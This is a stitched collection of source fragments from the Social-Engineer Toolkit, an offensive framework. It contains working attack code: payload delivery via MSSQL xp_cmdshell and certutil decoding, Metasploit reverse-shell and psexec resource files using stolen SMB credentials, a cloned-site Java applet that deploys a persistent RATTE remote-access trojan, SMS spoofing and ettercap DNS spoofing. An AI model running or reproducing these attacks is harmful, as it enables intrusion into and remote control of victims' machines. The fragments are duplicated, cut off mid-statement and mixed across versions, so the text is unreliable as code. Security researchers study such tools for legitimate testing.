"Be patient, Metasploit takes a little bit to start...")
child2.expect("Starting the payload handler", timeout=30000)
core.print_status(
"Metasploit started... Waiting a couple more seconds for listener to activate.."
)
time.sleep(5)
# assign random_exe command to the powershell command
random_exe = powershell_command
#
# next we deploy our hex to binary if we selected option 2 (debug)
#
if option == "2":
# here we start the conversion and execute the payload
core.print_status(
"Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
#with open(os.path.join(core.setdir + 'payload.hex'), 'r') as fileopen:
fileopen = open(core.setdir + 'payload.hex', "r")
core.print_status("Dropping initial begin certificate header...")
conn.execute_query(
"exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'"
.format(random_exe))
while fileopen:
data = fileopen.read(900).rstrip()
#for data in fileopen.read(900).rstrip():
if data == "":
break
core.print_status(
"Deploying payload to victim machine (hex): {bold}{data}{endc}\n"
.format(bold=core.bcolors.BOLD,
data=data,
endc=core.bcolors.ENDC))
conn.execute_query(
"exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format(
data=data, exe=random_exe))
core.print_status(
"Delivery complete. Converting hex back to binary format.")
core.print_status(
"Dropping end header for binary format conversion...")
conn.execute_query(
"exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'"
.format(random_exe))
core.print_status(
"Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled."
)
conn.execute_query(
"exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'".
format(random_exe))
core.print_status(
"Executing the payload - magic has happened and now its time for that moment.. "
"You know. When you celebrate. Salute to you ninja - you deserve it."
)
conn.execute_query(
"exec master..xp_cmdshell '{0}.exe'".format(random_exe))
# if we are using SET payload
if choice1 == "1":
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
core.print_status(
"Spawning separate child process for listener...")
try:
shutil.copyfile(os.path.join(core.setdir + "web_clone/x"),
definepath)
except:
pass
# start a threaded webserver in the background
subprocess.Popen("python src/html/fasttrack_http_server.py",
shell=True)
# grab the port options
# if core.check_options("PORT=") != 0:
# port = core.heck_options("PORT=")
#
# # if for some reason the port didnt get created we default to 443
# else:
# port = "443"
# thread is needed here due to the connect not always terminating thread,
# it hangs if thread isnt specified
try:
core.module_reload(thread)
except:
import thread
# execute the payload
# we append more commands if option 1 is used
if option == "1":
core.print_status("Triggering the powershell injection payload... ")
sql_command = (
"exec master..xp_cmdshell '{0}'".format(powershell_command))
thread.start_new_thread(conn.execute_query, (sql_command, ))
# using the old method
if option == "2":
core.print_status("Triggering payload stager...")
alphainject = ""
if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")):
with open(os.path.join(core.setdir +
"meterpreter.alpha")) as fileopen:
alphainject = fileopen.read()
sql_command = ("xp_cmdshell '{0}.exe {1}'".format(
random_exe, alphainject))
# start thread of SQL command that executes payload
thread.start_new_thread(conn.execute_query, (sql_command, ))
time.sleep(1)
# if pexpect doesnt exit right then it freaks out
if choice1 == "1":
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
os.system("python ../../payloads/set_payloads/listener.py")
try:
# interact with the child process through pexpect
child2.interact()
try:
os.remove("x")
except:
pass
except:
pass
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
trigger = 0
try:
import requests
except ImportError:
core.print_error(
"Looks like you dont have python-requests installed. "
"Please install (apt-get install python-requests) and try again."
)
input("Press {return} to continue.")
trigger = 1
def _do_sms():
print("""\n ----- The Social-Engineer Toolkit (SET) SMS Spoofing Attack Vector -----\n""")
print(
"This attack vector relies upon a third party service called www.spoofmytextmessage.com. "
"This is a third party service outside of the control from the Social-Engineer Toolkit. "
"The fine folks over at spoofmytextmessage.com have provided an undocumented API for us "
"to use in order to allow SET to perform the SMS spoofing. You will need to visit "
"https://www.spoofmytextmessage.com and sign up for an account. They example multiple "
"payment methods such as PayPal, Bitcoin, and many more options. Once you purchase your "
"plan that you want, you will need to remember your email address and password used for "
os.chdir("src/html/unsigned")
print """
Simply enter in the required fields, easy example below:
Name: FakeCompany
Organization: Fake Company
Organization Name: Fake Company
City: Cleveland
State: Ohio
Country: US
Is this correct: yes
"""
setcore.print_error("*** WARNING ***")
setcore.print_error("IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk")
setcore.print_error("*** WARNING ***")
# random string used to generate signature of java applet
random_string = setcore.generate_random_string(10, 30)
# grab keystore to use later
subprocess.Popen("keytool -genkey -alias %s -keystore mykeystore -keypass mykeypass -storepass mystorepass" % (random_string), shell=True).wait()
# self-sign the applet
subprocess.Popen("jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar unsigned.jar %s" % (random_string), shell=True).wait()
# move it into our html directory
subprocess.Popen("cp Signed_Update.jar ../", shell=True).wait()
subprocess.Popen("mv Signed_Update.jar ../../program_junk/", shell=True)
import src.core.setcore as core
import sys
import getpass
# Py2/3 compatibility
# Python3 renamed raw_input to input
try: input = raw_input
except NameError: pass
trigger = 0
try:
import requests
except ImportError:
core.print_error("Looks like you dont have python-requests installed. "
"Please install (apt-get install python-requests) and try again.")
input("Press {return} to continue.")
trigger = 1
def _do_sms():
print("""\n ----- The Social-Engineer Toolkit (SET) SMS Spoofing Attack Vector -----\n""")
print("This attack vector relies upon a third party service called www.spoofmytextmessage.com. "
"This is a third party service outside of the control from the Social-Engineer Toolkit. "
"The fine folks over at spoofmytextmessage.com have provided an undocumented API for us "
"to use in order to allow SET to perform the SMS spoofing. You will need to visit "
"https://www.spoofmytextmessage.com and sign up for an account. They example multiple "
"payment methods such as PayPal, Bitcoin, and many more options. Once you purchase your "
"plan that you want, you will need to remember your email address and password used for "
"the account. SET will then handle the rest.\n")
print("In order for this to work you must have an account over at spoofmytextmessage.com\n")
def main():
valid_site = False
valid_ip = False
# valid_persistence = False
input_counter = 0
site_input_counter = 0
ipaddr = None
website = None
# pause=input("This module has finished completing. Press <enter> to continue")
# Get a *VALID* website address
while not valid_site and site_input_counter < 3:
website = input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
site = urlparse(website)
if site.scheme == "http" or site.scheme == "https":
if site.netloc != "":
valid_site = True
else:
if site_input_counter == 2:
core.print_error("\nМожет быть, вы неправильно записали адрес?" + core.bcolors.ENDC)
sleep(4)
return
else:
core.print_warning("Я не могу определить fqdn или IP сайта. Попробуй снова?")
site_input_counter += 1
else:
if site_input_counter == 2:
core.print_error("\nМожет быть, вы неправильно записали адрес?")
sleep(4)
return
else:
core.print_warning("Я не мог определить, является ли это http или https сайтом. Попробуй снова?")
site_input_counter += 1
# core.DebugInfo("site.scheme is: %s " % site.scheme)
# core.DebugInfo("site.netloc is: %s " % site.netloc)
# core.DebugInfo("site.path is: %s " % site.path)
# core.DebugInfo("site.params are: %s " % site.params)
# core.DebugInfo("site.query is: %s " % site.query)
# core.DebugInfo("site.fragment is: %s " % site.fragment)
while not valid_ip and input_counter < 3:
ipaddr = input(core.setprompt(["9", "2"], "Введите IP-адрес для подключения"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error("\nМожет быть, вы неправильно записали адрес?")
sleep(4)
return
else:
input_counter += 1
# javaport must be 80, cause applet uses in web injection port 80 to download payload!
try:
javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]")))
while javaport == 0 or javaport > 65535:
if javaport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if javaport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]")))
except ValueError:
# core.print_info("Port set to default of 80")
javaport = 80
try:
ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]")))
while ratteport == javaport or ratteport == 0 or ratteport > 65535:
if ratteport == javaport:
core.print_warning("Порт не должен быть равен javaport!")
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]")))
except ValueError:
ratteport = 8080
persistent = core.yesno_prompt(["9", "2"], "Должен ли RATTE быть постоянным [no|yes]?")
# j0fer 06-27-2012 # while valid_persistence != True:
# j0fer 06-27-2012 # persistent=input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# j0fer 06-27-2012 # persistent=str.lower(persistent)
# j0fer 06-27-2012 # if persistent == "no" or persistent == "n":
# j0fer 06-27-2012 # persistent="NO"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y":
# j0fer 06-27-2012 # persistent="YES"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # else:
# j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES)
customexe = input(core.setprompt(["9", "2"], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]? "))
#######################################
# prepare RATTE
#######################################
prepare_ratte(ipaddr, ratteport, persistent, customexe)
######################################
# Java Applet Attack to deploy RATTE
#######################################
core.print_info("Запуск атаки Java-апплета..")
java_applet_attack_tw(website, javaport, "reports/", ipaddr)
with open(os.path.join(userconfigpath, definepath, "/rand_gen")) as fileopen:
for line in fileopen:
ratte_random = line.rstrip()
subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(userconfigpath, definepath), definepath, ratte_random), shell=True).wait()
#######################
# start ratteserver
#######################
core.print_info("Стартовый ратсервер...")
ratte_listener_start(ratteport)
######################
# stop webserver
######################
stop_web_server_tw()
return
#!/usr/bin/env python
# coding=utf-8
from src.sms.protectedapi import send_sms
import src.core.setcore as core
try:
import requests
except ImportError:
core.print_error("Looks like you dont have python-requests installed. "
"Please install (apt-get install python-requests) and try again.")
print("Press {return} to continue.")
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
print("""\n ----- The Social-Engineer Toolkit (SET) SMS Spoofing Attack Vector -----\n""")
print("This attack vector relies upon a third party service called www.spoofmytextmessage.com. "
"This is a third party service outside of the control from the Social-Engineer Toolkit. "
"The fine folks over at spoofmytextmessage.com have provided an undocumented API for us "
"to use in order to allow SET to perform the SMS spoofing. You will need to visit "
"https://www.spoofmytextmessage.com and sign up for an account. They example multiple "
"payment methods such as PayPal, Bitcoin, and many more options. Once you purchase your "
"plan that you want, you will need to remember your email address and password used for "
"the account. SET will then handle the rest.\n")
if counter == 1:
payload_counter = 1
counter += 1
if choice != "14":
# Open the IPADDR file
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input(
core.setprompt(["6"], "IP address to connect back on"))
core.update_options("IPADDR=" + ipaddr)
if not os.path.isfile(os.path.join(core.userconfigpath, "teensy")):
core.print_error(
"FATAL:Something went wrong, the Teensy config file was not created."
)
core.exit_set()
def writefile(filename, now):
with open(os.path.join("src/teensy/" + filename)) as fileopen, \
open(os.path.join(core.userconfigpath, "reports/teensy_{0}.ino".format(now)), "w") as filewrite:
for line in fileopen:
match = re.search("IPADDR", line)
if match:
line = line.replace("IPADDR", ipaddr)
match = re.search("12,12,12,12", line)
if match:
ipaddr_replace = ipaddr.replace(".", ",", 4)
def main():
valid_site = False
valid_ip = False
valid_response = False
input_counter = 0
#################
# get User Input
#################
# ipaddr=input(setprompt(["9", "2"], "IP address to connect back on"))
while valid_ip != True and input_counter < 3:
ipaddr = input(
core.setprompt(["9", "2"],
"Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error(
"\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
# try:
# ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
# while ratteport==0 or ratteport > 65535:
# print_warning('Port must not be equal to javaport!')
# ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
# except ValueError:
# ratteport=8080
try:
ratteport = int(
input(
core.setprompt(["9", "2"],
"Port RATTE Server should listen on [8080]")))
while ratteport == 0 or ratteport > 65535:
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(
input(
core.setprompt(
["9", "2"],
"Enter port RATTE Server should listen on [8080]")))
except ValueError:
# core.print_info("Port set to default of 8080")
ratteport = 8080
# persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# if persistent == 'no' or persistent == '' or persistent == 'n':
# persistent='NO'
# else:
# persistent='YES'
while not valid_response:
persistent = input(
core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
persistent = str.lower(persistent)
if persistent == "no" or persistent == "n":
persistent = "NO"
valid_response = True
elif persistent == "yes" or persistent == "y":
persistent = "YES"
valid_response = True
else:
core.print_warning(text.YES_NO_RESPONSES)
valid_response = False
customexe = input(
core.setprompt([
"9", "2"
], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
############
# prepare RATTE
############
prepare_ratte(ipaddr, ratteport, persistent, customexe)
core.print_status("Payload has been exported to %s" %
os.path.join(core.userconfigpath, "ratteM.exe"))
###################
# start ratteserver
###################
# prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
# if prompt == "yes" or prompt == "" or prompt == "y":
# print_info("Starting ratteserver...")
# ratte_listener_start(ratteport)
while not valid_response:
prompt = input(
core.setprompt(["9", "2"],
"Start the ratteserver listener now [yes|no]"))
prompt = str.lower(prompt)
if prompt == "no" or prompt == "n":
# prompt = "NO"
core.print_error("Aborting...")
sleep(2)
valid_response = True
elif prompt == "yes" or prompt == "y":
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
core.print_info("Stopping ratteserver...")
sleep(2)
valid_response = True
else:
core.print_warning(
"valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
print("""
This menu will allow you to import or create a valid code signing certificate for the Java Applet attack.
You will need to purchase a code signing certificate through GoDaddy, Thawte, Verisign, etc. in order to
make this work. This menu will automate the portions for you to either create the request to submit to the
certificate authority or allow you to import a code signing certificate that you may already have.
Note that purchasing a code signing certificate is somewhat difficult. It requires you to have a business name and
prove the legitimacy of that certificate. That means you have to register a business with the state and everything else.
Good news is, the process to do that is extremely simple. All in all, it should cost roughly around $300-350 to setup your
business, buy a code signing certificate, and publish an applet to be whatever you want. You can also do a "DBA" or doing
business as which is also much easier to use.
""")
core.print_error("*** WARNING ***")
core.print_error("IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk")
core.print_error("*** WARNING ***")
# use flag is in case someone already has a code signing certificate, in
# that case it bypasses the "no" answer
use_flag = 0
print("""
[--------------------------------]
Initial Selection Process
[--------------------------------]
There are a few choice here, the first is do you want to import your own Java Applet that you've already signed. If you already have the certificate and want to use the SET applet, you can find an unsigned version under src/html/unsigned/unsigned.jar. If you want to use this menu, you can as well.
Option 1 will import your own SIGNED applet that you already have.
import _thread as thread
import shutil
import re
import socket
import datetime
import string
import random
import multiprocessing
operating_system = core.check_os()
if operating_system == "posix":
try:
import pexpect
except ImportError:
core.print_error(
"python-pexpect is not installed.. some things may not work.")
core.return_continue()
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# see if we are tracking emails
track_email = core.check_config("TRACK_EMAIL_ADDRESSES=").lower()
# grab the randomized applet name
applet_name = core.check_options("APPLET_NAME=")
if applet_name == "":
import _thread as thread
import shutil
import re
import socket
import datetime
import string
import random
import multiprocessing
operating_system = core.check_os()
if operating_system == "posix":
try:
import pexpect
except ImportError:
core.print_error("python-pexpect is not installed.. some things may not work.")
core.return_continue()
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# see if we are tracking emails
track_email = core.check_config("TRACK_EMAIL_ADDRESSES=").lower()
# grab the randomized applet name
applet_name = core.check_options("APPLET_NAME=")
if applet_name == "":
if counter == 0:
choice = str(line)
if counter == 1:
payload_counter = 1
counter += 1
if choice != "14":
# Open the IPADDR file
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input(core.setprompt(["6"], "IP address to connect back on"))
core.update_options("IPADDR=" + ipaddr)
if not os.path.isfile(os.path.join(core.setdir + "teensy")):
core.print_error("FATAL:Something went wrong, the Teensy config file was not created.")
core.exit_set()
def writefile(filename, now):
with open(os.path.join("src/teensy/" + filename)) as fileopen, \
open(os.path.join(core.setdir + "/reports/teensy_{0}.pde".format(now)), "w") as filewrite:
for line in fileopen:
match = re.search("IPADDR", line)
if match:
line = line.replace("IPADDR", ipaddr)
match = re.search("12,12,12,12", line)
if match:
ipaddr_replace = ipaddr.replace(".", ",", 4)
line = line.replace("12,12,12,12", ipaddr_replace)
def main():
valid_site = False
valid_ip = False
valid_response = False
input_counter = 0
#################
# get User Input
#################
# ipaddr=input(setprompt(["9", "2"], "IP address to connect back on"))
while valid_ip != True and input_counter < 3:
ipaddr = input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
# try:
# ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
# while ratteport==0 or ratteport > 65535:
# print_warning('Port must not be equal to javaport!')
# ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
# except ValueError:
# ratteport=8080
try:
ratteport = int(input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == 0 or ratteport > 65535:
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(input(core.setprompt(["9", "2"], "Enter port RATTE Server should listen on [8080]")))
except ValueError:
# core.print_info("Port set to default of 8080")
ratteport = 8080
# persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# if persistent == 'no' or persistent == '' or persistent == 'n':
# persistent='NO'
# else:
# persistent='YES'
while not valid_response:
persistent = input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
persistent = str.lower(persistent)
if persistent == "no" or persistent == "n":
persistent = "NO"
valid_response = True
elif persistent == "yes" or persistent == "y":
persistent = "YES"
valid_response = True
else:
core.print_warning(text.YES_NO_RESPONSES)
valid_response = False
customexe = input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
############
# prepare RATTE
############
prepare_ratte(ipaddr, ratteport, persistent, customexe)
core.print_status("Payload has been exported to %s" % os.path.join(core.setdir + "ratteM.exe"))
###################
# start ratteserver
###################
# prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
# if prompt == "yes" or prompt == "" or prompt == "y":
# print_info("Starting ratteserver...")
# ratte_listener_start(ratteport)
while not valid_response:
prompt = input(core.setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
prompt = str.lower(prompt)
if prompt == "no" or prompt == "n":
# prompt = "NO"
core.print_error("Aborting...")
sleep(2)
valid_response = True
elif prompt == "yes" or prompt == "y":
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
core.print_info("Stopping ratteserver...")
sleep(2)
valid_response = True
else:
core.print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
with open(core.setdir + "/reports/powershell/powershell.rc",
"w") as filewrite:
filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n"
"set LPORT {0}\n"
"set LHOST {1}\n"
"set EnableStageEncoding true\n"
"set ExitOnSession false\n"
"exploit -j\n"
"use auxiliary/admin/smb/psexec_command\n"
"set RHOSTS {2}\n"
"set SMBUser {3}\n"
"set SMBPass {4}\n"
"set SMBDomain {5}\n"
"set THREADS {6}\n"
"set COMMAND {7}\n"
"exploit\n".format(port, ipaddr, rhosts, username,
password, domain, threads, command,
stage_encoding))
# launch metasploit below
core.print_status("Launching Metasploit.. This may take a few seconds.")
subprocess.Popen("{0} -r {1}".format(
os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.setdir + "reports/powershell/powershell.rc")),
shell=True).wait()
# handle exceptions
except Exception as e:
core.print_error("Something went wrong printing error: {0}".format(e))
payload = "windows/meterpreter/reverse_https\n" # if we are using x86
command = x86 # assign powershell to command
# write out our answer file for the powershell injection attack
with open(core.userconfigpath + "reports/powershell/powershell.rc", "w") as filewrite:
filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n"
"set LPORT {0}\n"
"set LHOST {1}\n"
"set EnableStageEncoding true\n"
"set ExitOnSession false\n"
"exploit -j\n"
"use auxiliary/admin/smb/psexec_command\n"
"set RHOSTS {2}\n"
"set SMBUser {3}\n"
"set SMBPass {4}\n"
"set SMBDomain {5}\n"
"set THREADS {6}\n"
"set COMMAND {7}\n"
"exploit\n".format(port, ipaddr, rhosts, username, password, domain, threads, command, stage_encoding))
# launch metasploit below
core.print_status("Launching Metasploit.. This may take a few seconds.")
subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.userconfigpath, "reports/powershell/powershell.rc")),
shell=True).wait()
# handle exceptions
except Exception as e:
core.print_error("Something went wrong printing error: {0}".format(e))
filewrite=file("etter.dns", "w")
# send our information to etter.dns
filewrite.write("%s A %s" % (dns_spoof,ipaddr))
# close the file
filewrite.close()
# set bridge variable to nothing
bridge=""
# assign -M arp to arp variable
arp="-M arp"
# grab input from user
#bridge_q=raw_input(setcore.setprompt("0", "Use bridged mode [yes|no]"))
#if bridge_q == "y" or bridge_q == "yes":
# bridge_int=raw_input(setcore.setprompt("0", "Network interface for the bridge"))
# bridge="-B "+str(bridge_int)
#arp=""
setcore.print_error("LAUNCHING ETTERCAP DNS_SPOOF ATTACK!")
# spawn a child process
os.chdir(cwd)
time.sleep(5)
filewrite=file("src/program_junk/ettercap","w")
filewrite.write("ettercap -T -q -i %s -P dns_spoof %s %s // //" % (interface,arp,bridge))
filewrite.close()
os.chdir(cwd)
except Exception, error:
os.chdir(cwd)
#log(error)
setcore.print_error("ERROR:An error has occured:")
print "ERROR:" +str(error)
# if we are using dsniff
if dsniffchoice == 'y':
def main():
valid_site = False
valid_ip = False
valid_persistence = False
input_counter = 0
site_input_counter = 0
#pause=raw_input("This module has finished completing. Press <enter> to continue")
# Get a *VALID* website address
while valid_site != True and site_input_counter < 3:
website = raw_input(
core.setprompt(["9", "2"],
"Enter website to clone (ex. https://gmail.com)"))
site = urlparse.urlparse(website)
if site.scheme == "http" or site.scheme == "https":
if site.netloc != "":
valid_site = True
else:
if site_input_counter == 2:
core.print_error(
"\nMaybe you have the address written down wrong?" +
core.bcolors.ENDC)
sleep(4)
return
else:
core.print_warning(
"I can't determine the fqdn or IP of the site. Try again?"
)
site_input_counter += 1
else:
if site_input_counter == 2:
core.print_error(
"\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
core.print_warning(
"I couldn't determine whether this is an http or https site. Try again?"
)
site_input_counter += 1
#core.DebugInfo("site.scheme is: %s " % site.scheme)
#core.DebugInfo("site.netloc is: %s " % site.netloc)
#core.DebugInfo("site.path is: %s " % site.path)
#core.DebugInfo("site.params are: %s " % site.params)
#core.DebugInfo("site.query is: %s " % site.query)
#core.DebugInfo("site.fragment is: %s " % site.fragment)
while valid_ip != True and input_counter < 3:
ipaddr = raw_input(
core.setprompt(["9", "2"],
"Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error(
"\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
#javaport must be 80, cause applet uses in web injection port 80 to download payload!
try:
javaport = int(
raw_input(
core.setprompt(["9", "2"],
"Port Java applet should listen on [80]")))
while javaport == 0 or javaport > 65535:
if javaport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if javaport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
javaport = int(
raw_input(
core.setprompt(["9", "2"],
"Port Java applet should listen on [80]")))
except ValueError:
#core.print_info("Port set to default of 80")
javaport = 80
#javaport=80
try:
ratteport = int(
raw_input(
core.setprompt(["9", "2"],
"Port RATTE Server should listen on [8080]")))
while ratteport == javaport or ratteport == 0 or ratteport > 65535:
if ratteport == javaport:
core.print_warning("Port must not be equal to javaport!")
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(
raw_input(
core.setprompt(
["9", "2"],
"Port RATTE Server should listen on [8080]")))
except ValueError:
ratteport = 8080
persistent = core.yesno_prompt(
["9", "2"], "Should RATTE be persistentententent [no|yes]?")
# j0fer 06-27-2012 # while valid_persistence != True:
# j0fer 06-27-2012 # persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# j0fer 06-27-2012 # persistent=str.lower(persistent)
# j0fer 06-27-2012 # if persistent == "no" or persistent == "n":
# j0fer 06-27-2012 # persistent="NO"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y":
# j0fer 06-27-2012 # persistent="YES"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # else:
# j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES)
customexe = raw_input(
core.setprompt([
"9", "2"
], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
#######################################
# prepare RATTE
#######################################
prepare_ratte(ipaddr, ratteport, persistent, customexe)
######################################
# Java Applet Attack to deploy RATTE
#######################################
core.print_info("Starting java applet attack...")
java_applet_attack_tw(website, javaport, "reports/", ipaddr)
fileopen = file("%s/src/program_junk/rand_gen" % (definepath), "r")
for line in fileopen:
ratte_random = line.rstrip()
subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" %
(definepath, definepath, ratte_random),
shell=True).wait()
#######################
# start ratteserver
#######################
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
######################
# stop webserver
######################
stop_web_server_tw()
return
#!/usr/bin/env python
import random
from src.core import setcore as core
try:
print("\n [****] Custom Template Generator [****]\n")
author = raw_input(core.setprompt(["7"], "Name of the author"))
filename = randomgen = random.randrange(1, 99999999999999999999)
filename = str(filename) + (".template")
origin = raw_input(core.setprompt(["7"], "Source phone # of the template"))
subject = raw_input(core.setprompt(["7"], "Subject of the template"))
body = raw_input(core.setprompt(["7"], "Body of the message"))
filewrite = file("src/templates/sms/%s" % (filename), "w")
filewrite.write("# Author: " + author + "\n#\n#\n#\n")
filewrite.write('ORIGIN=' + '"' + origin + '"\n\n')
filewrite.write('SUBJECT=' + '"' + subject + '"\n\n')
filewrite.write('BODY=' + '"' + body + '"\n')
print "\n"
filewrite.close()
except Exception, e:
core.print_error("An error occured:")
core.print_error("ERROR:" + str(e))
